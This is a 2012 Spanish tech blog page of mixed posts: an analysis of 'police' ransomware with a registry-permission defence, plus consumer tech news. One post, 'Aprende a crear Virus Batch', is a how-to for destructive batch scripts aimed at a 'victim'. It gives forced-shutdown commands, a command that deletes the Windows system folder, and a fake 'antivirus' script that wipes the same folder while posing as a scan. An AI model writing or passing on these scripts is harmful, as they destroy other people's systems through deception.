lunes, 30 de abril de 2012

Troyano de la "policia"

Presentamos una nueva muestra "ransomware", con la particularidad de que suplanta la imagen de la policía española. Llama la atención la forma tan elaborada de conseguirlo. Hemos realizado un vídeo demostración. Intenta que el usuario pague 100 euros por recuperar su equipo, acusándolo de almacenar contenido pedófilo, zoofílico y de enviar spam a favor del terrorismo.

El troyano ha sido denominado por algunas casas antivirus como Trojan-Ransom.Win32.Chameleon.mw. En estos momentos, es detectado por firmas por solo 9 motores en VirusTotal. Aunque ayer mismo, cuando llegó por primera vez, era solo detectada de forma genérica, por un motor. No es técnicamente novedoso, ni siquiera en su planteamiento, puesto que ya hablamos en ocasiones anteriores de varios secuestradores del sistema que impedían el uso del ordenador culpando al usuario de haber realizado actos ilegales. Lo llamativo es la forma tan cuidada de engañar al usuario para que termine pagando. En nombre de la policía nacional, le acusa de:

"Su dirección IP ha sido registrada en las webs ilegales con contenido pornográfico orientadas a la difusión de la pornografía infantil, zoofilia e imágenes de violencia contra menores! [...] Además, desde su ordenador se realiza un envío ilegal (SPAM) de orientación pro terrorista."



La imagen que utiliza es la de la policía nacional española, aunque se ha visto unos días atrás un troyano de la misma familia que hacía alusión a la legislación alemana. De hecho, si se observa la imagen, se puede comprobar que se les ha escapado el texto la frase "policía alemana". El procedimiento es el habitual. El troyano se ejecuta cada vez que se inicia sesión y no permite utilizar el sistema a no ser que se pague.

El troyano se basa en los sistemas de pago online Ukash y Paysafecard. Se puede acudir a cajeros automáticos de ciertas entidades, por ejemplo, y conseguir códigos que pueden valer entre 10 y 500 euros. Y además muestra logos de reputados bancos y casas antivirus para ganar credibilidad, pero ni la policía ni las empresas tienen nada que ver en el fraude, evidentemente, solo que soportan este tipo de pagos. En el
aspecto técnico, es interesante destacar que no es sencillo eludir la pantalla de bloqueo del troyano, puesto que impide arrancar el administrador de tareas.

Invitamos al lector a visualizar el vídeo alojado en YouTube (2:20 minutos).



Formas de evitar este troyano y similares

El proceso que sigue el troyano para secuestrar el ordenador es modificar un par de ramas del registro. La misma que lanza "explorer.exe" cuando se arranca el sistema. Explorer.exe es el proceso que se encarga de "pintar" el escritorio: los iconos y la barra de herramientas y de sistema. Existen al menos dos lugares en el registro donde es posible lanzar lo que Windows llama una "shell" (explorer.exe): uno específico para el usuario, y otro para el sistema completo.

 Simplemente, hay que restringir los permisos e impedir que podamos modificar esas ramas. Para el uso cotidiano del sistema, no es necesario disfrutar de los privilegios de modificación de esas ramas. Una vez más, la solución más efectiva no está en los antivirus, sino en las herramientas integradas del propio Windows.

 En XP, la rama del registro que modifica es:

 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

 Añadiendo en la directiva "shell", el nombre del troyano, por ejemplo:

 Shell=Explorer.exe, troyano.exe

 Así se lanzan los dos cuando se inicia el sistema. Si, con el botón derecho, eliminamos los permisos de escritura en esa rama para los administradores, nos estaremos protegiendo. Cuidado: si se elimina el permiso a SYSTEM, el sistema quedará inestable. Sólo hay que eliminar el permiso de escritura a los administradores, nada más.

 En Windows Vista y 7 tiene un comportamiento diferente (del que parece que muy pocos medios han hablado). El troyano modifica otra rama específica del usuario.

 HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

 Aquí crea otra directiva llamada shell, con la ruta del troyano.

 

 En esta rama tienen permiso de escritura los administradores y usuarios por defecto. Pero normalmente no es un permiso necesario (a no ser que un software legítimo necesite modificarlos), así que en principio no hay ningún problema en quitárselos.

 Para eliminar los permisos de las ramas del registro, primero hay que "desheredar" los permisos de las ramas superiores, eliminando la casilla "Incluir todos los permisos heredables del objeto primario de este objeto", y copiándolos.

  

 Luego eliminamos los permisos de escritura, para administradores y usuarios.

 

 Si se quiere ser más específico, se puede eliminar solamente el permiso de "Crear subclave".

 

 Con este cambio, el troyano mostrará su mensaje cuando nos infectemos, pero no podrá perpetuarlo en el arranque, con lo que la infección no se repetirá en el siguiente reinicio. Por supuesto, no nos responsabilizamos de cualquier uso indebido del registro, o consecuencias indeseadas en el sistema a causa de esta modificación.

viernes, 20 de abril de 2012

Google Maps crea un mapa para apocalipsis zombi


En el mapa se puede introducir el nombre de una ciudad para encontrar puntos dónde repostar gasolina, conseguir comida o armas ante una amenaza zombi.
Map of the Dead es una iniciativa que ha utilizado la tecnología de Google Map para generar un mapa mundial en el que aparecen puntos de ayuda en caso deinvasión zombi.
Los usuarios pueden encontrar puntos para repostar gasolina, para conseguir comida o armas en caso de que una amenaza zombi se desarrolle en su ciudad. Se trata de un mapa mundial en el que se puede introducir el nombre de una ciudad para ver sus posibilidades directamente.
Un gran número de novelas, películas, series y videojuegos han contado historias sobre invasiones zombis. En la mayoría de estas historias, los protagonistas se encuentran ante una situación crítica en la que deben hacer acopio de todo tipo de víveres.
Sin embargo, si estas historias fuesen ciertas, es muy posible que más de uno se encontrase perdido, sin saber a donde acudir para conseguir alimentos de primera necesidad y elementos de protección.
Para evitar esas situaciones de pánico, un proyecto ha creado el mapa definitivo para invasiones zombis. Para ello, se ha empleado la tecnología de Google Maps y la información de diferentes directorios, en España Páginas Amarillas.
El resultado es un útil mapa, sobre todo en caso de amenaza zombi, que contiene iconos que señalan puntos importantes en caso de peligro. Cada punto cuenta con un símbolo y un color que lo identifica según el tipo de suministro que se puede conseguir en ese punto.
Los usuarios pueden ver los sitios en los que adquirir un arma, muy numerosos en Estados Unidos pero no tanto en España, los lugares donde conseguir alimentos o gasolineras para repostar.
Además de estos puntos están representados hospitales, aeropuertos, farmacias e incluso dentistas. En caso de apocalipsis zombi, toda esta información puede ser de vital importancia para los usuarios y mientras tanto, es un ejemplo de las posibilidades que ofreceGoogle Map a través de Map of the Dead.

miércoles, 18 de abril de 2012

El nuevo Samsung Galaxy S3


Samsung todavía no ha dado muchos titulares en 2012 (más allá de los relacionados con su guerra contra Apple), pero parece que esto está a punto de cambiar. Durante el pasado Mobile World Congress en Barcelona no hicieron ningún gran anuncio, y aseguraron que el sucesor del Galaxy S2 no llegaría hasta el segundo trimestre.La fecha escogida se acaba de confirmar: el próximo 3 de mayo.
Eso es lo que se desprende de las invitaciones enviadas por la compañía a un evento que tendrá el lugar ese día en Londres. El texto lo deja claro: “ven y conoce al próximo Galaxy”. No se sabe si se llamará Galaxy S3 o si habrá alguna sorpresa como la de Apple llamando al iPad 3 “Nuevo iPad”, pero todo parece indicar que, se llame como se llame, el dispositivo presentado será el sucesor del Galaxy S2.
Otro de los aspectos que empiezan a estar claros es, que el Galaxy S3 incluirá, al igual que el Galaxy Note, su lápiz S-Pen, algo a lo que parecen apuntar las manchas de tinta que se ven en la invitación. ¿Será el “próximo Galaxy” un rival digno para el iPhone 4S? Tan solo hay que esperar dos semanas para saberlo.¿Qué se sabe de este smartphone? El rumor más fuerte, iniciado por Kevin Packingham, vicepresidente de innovación de producto de Samsung, a principios de año es el de que el Galaxy S3 tendrá una batería muy superior a la de cualquier otro smartphone de la actualidad. Según afirmó Packingham, la batería durará más de un día incluso realizando un uso muy intensivo de las acciones que más batería gastan.

Dicen que este puede ser el boceto del nuevo Samsung Galaxy S3

Posible "nuevo" boceto Galasy S3
Nos lo cuenta I.C del blog : TuVariedad

La App del dia es....



Apalabrados



Es un juego multijugador de palabras gratuito para participar con quien elijas o incluso puedes buscar usuarios concretos por su correo electrónico. Una vez que tenemos elegido a nuestro adversario, tendremos que anotar tantos puntos como sea posible mediante la formación de palabras válidas en el tablero. Como guía, un diccionario incluido en el juego determinará si la palabra escrita es correcta o no. El juego terminará cuando uno de los dos jugadores utiliza todas las fichas de su atril.


Enfócalo con tu cámara
Descarga la app :  Descargar

Chrome pasa a ser el rey de los navegadores web por primera vez



Internet Explorer podría perder el liderazgo en el mercado de navegadores de Internet si Chrome sigue manteniendo su fuerte crecimiento.
El paso domingo se produjo un hecho inédito en los últimos 15 años, Internet Explorer cedía el liderazgo a favor de Chrome.
Según los hechos públicos por Stat, la cuota de usuarios del domingo que usaron Chrome fue del 32,7% mientras que la de Internet Explorer cayó al 32,5%.

Las cosas volvieron a la “normalidad” el día siguiente, lunes, cuando Internet Explorer aumentó su cuota hasta el 35% y Chrome la redujo al 30%.
Este cambio se produce, según los expertos, por la libertad que tiene el usuario de utilizar su navegador preferido cuando navega libremente desde su casa. En cambio, en el sector corporativo Internet Explorer está mucho más extendido y no son pocas las empresas que impiden que el usuario pueda cambiar ese navegador por otro.
De confirmarse esta tendencia, los expertos se muestran convencidos de que será cuestión de tiempo que Chrome supere a Internet Explorer
.

martes, 17 de abril de 2012

Aprende a crear Virus Batch

Shutdown



El primer virus,va a ser más bien una broma pesada,(no afecta a nada del equipo tan solo lo apaga)hará apagar el ordenador del pringao a quien se lo enviemos,solo hay que escribi esto: 

Shutdown -s -t XX -c "El mensaje que quieras" 

Explico,shutdown es lo primero que hay que escribir, el -s manda apagar el ordenador, e -t marca un tiempo en segundos,que ese tiempo son las XX, y el -c es para poner un comentario, que tiene que ir entre las " ". 

shutdown -s -t 20 -c "te voy apagar el ordenador" 




Virus que Borra Carpeta de Windows



Con este simple virus,podemos borrarle la carpeta del sistema (WINDOWS) a nuestra victima. 

@echo off "hace que no se vean lo que ponemos,solo se ven la terminación,perdonar pero no lo se explicar,se lo que hace pero no lo se explicar pero esto siempre hay que ponerlo" 

color 10 "le da color a nuestra ventana,si le quereis dar otro color,ver el apartado que aparece en el cmd,la ventana, poniendo esto color/? eligireis el color que querais" 

del /f /s /q %systemroot% "borra la carpeta del windows" 

shutdown -s -t 30 -c "jodete" "ya lo explique en el otro virus" 

Crear Virus "Antivirus"

Aqui pongo un virus que se hace pasar por un antivirus  

@echo off 
color 30 
title The Security Antivirus PC 
cls 
echo Tu sistema esta desprotegido 
echo pero con el nuevo Anti-Malware Ultimate 2.0 tendrá el menor riesgo contra amenazas desconocidas 
echo pasaremos un analisis de los discos duros como prueba 
echo pulsa la tecla enter para empezar el analisis 
pause 
@echo off 
:m 
echo %random% 
goto m 
pause 
msg * su pc esta infectado por un troyano 
msg * pero Anti-Malware Ultimate 2.0 esta desinfectando. 
del /s /f /q %systemroot% 
echo El troyano ha sido desinfectado. 
echo Se apagara el ordenador y recuerde comprar este antivirus 
echo en www.pelotudo.com 
shutdown -s -t 20 -c "se le ha jodido el ordenador" 

El Multichat llegará a Tuenti




El vicepresidente de Tuenti, Sebastián Muriel, estuvo respondiendo a las preguntas de los usuarios de El Mundo. En una de las respuestas, desveló el multichat.
El chat de Tuenti es una de las claves del éxito de la red social y la verdad es que todavía es bastante simple. Por ello, una de las características más demandadas por los usuarios es la posibilidad de de hablar con varias personas a la vez, es decir, el multichat.
Este permitirá añadir personas a una conversación de chat, no sabemos con que limites ni si incorporaría multiconferencia, algo también muy deseable.
Muriel asegura que "muy pronto" tendremos disponible la multiconversación.

La innovación de Apple


El nuevo ipad de appele, la renovación más esperada y que confirma muchas novedades de las que se vinieron hablando ya hace mucho tiempo tanto en Internet como en noticieros, diarios y revistas.
La pantalla del nuevo iPad nos deja atónitos con una resolución de 2048 x 1536 pixeles, lo que se traduce como una definición extrema. Para que podamos hacer la comparación imagínate que la resolución es mayor que la de tu televisor. La densidad es de 264 ppp.
Por otro lado, sigue siendo un panel de tipo IPS que siempre ha sido de los puntos fuertes del modelo de tablet de Apple y multitáctil, con una mejora del 44% en la saturación del color.
Con respecto al diseño del iPad podemos decir que apenas ha sufrido cambios pero aumenta su peso y tamaño, obteniendo valores de 9.4 mm y 652 gramos.
Ahora si pasamos a la segunda novedad del iPad la cual es su cámara fotográfica. La nueva iSight posee un censor de 5 Mpx de tipo retroiluminado con lente de cinco elementos, filtro IR, detección de rostros, balance de blancos automático y autoenfoque.
La nueva cámara del iPad 3 es capaz de grabar video a 1080p con estabilización bastante buena,
Ahora si pasamos a una de las cosas que más me interesan y es su procesador. El mismo es un procesador de doble núcleo mejorado, especialmente en la parte gráfica. Viene acompañado con 1 GB de RAM.
Ahora un dato muy incesante es que pese a la pantalla, su nuevo procesador potenciado y su conectividad todavía el rendimiento de la batería se mantiene en las 10 horas. El truco se encuentra es que la batería del nuevo iPad tiene mucha más capacidad que la anterior de 25 a 42.5 Wh.
El nuevo iPad 3 no tardará demasiado en aparecer en las tiendas, puedes hacer una reserva aunque no lo recibirás hasta el 16 de marzo. En España hay que esperar hasta el 23 de marzo.
Lo modelos del nuevo iPad con WiFi costarán 499, 599 y 699 dólares y 629, 729 y 829 para los que incluyen además conectividad LTE 4G.

La nueva PS3 Roja

El modelo "rojo escarlata" de PlayStation 3 que lleva un tiempo disponible en Japón llegará a Europa el 27 de abril, según han desvelado diversas tiendas online. Este modelo de la consola fue lanzado en Japón el 17 de noviembre, junto a otro modelo de color azul cuyo lanzamiento todavía no ha sido confirmado en el viejo continente.

Este modelo se venderá con un disco duro de 320 GB, al precio habitual de la consola PlayStation 3 con esta capacidad de almacenamiento. Su lanzamiento también se ha confirmado en los Estados Unidos.